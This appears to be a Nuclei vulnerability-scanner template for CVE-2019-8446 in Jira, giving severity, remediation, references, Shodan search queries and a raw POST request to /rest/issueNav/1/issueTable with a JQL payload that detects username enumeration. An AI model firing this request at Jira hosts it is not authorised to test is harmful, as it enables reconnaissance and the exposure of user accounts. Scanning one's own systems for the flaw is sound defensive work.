id: CVE-2019-8446 info: name: Jira Improper Authorization author: dhiyaneshDk severity: medium description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. impact: | This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application. remediation: | Apply the latest security patches and updates provided by Atlassian to fix the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-69777 - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/CyberTrashPanda/CVE-2019-8446 - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-8446 cwe-id: CWE-863 epss-score: 0.15691 epss-percentile: 0.95925 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: jira_server shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" tags: cve,cve2019,jira,atlassian http: - raw: - | POST /rest/issueNav/1/issueTable HTTP/1.1 Host: {{Hostname}} Connection: Close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 X-Atlassian-Token: no-check Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 {'jql':'project in projectsLeadByUser("{{randstr}}")'} matchers-condition: and matchers: - type: word part: body words: - "the user does not exist" - type: status status: - 200 # digest: 4a0a0047304502204402fa80c3d39a5166142c4b70e67d7a090e7eefa656bf0c5856e6ac862334030221009b56863e79158a7b96df999f5c8c0ebb9953967871b5b2523f3bbc19265954a4:922c64590222798bb761d5b6d8e72950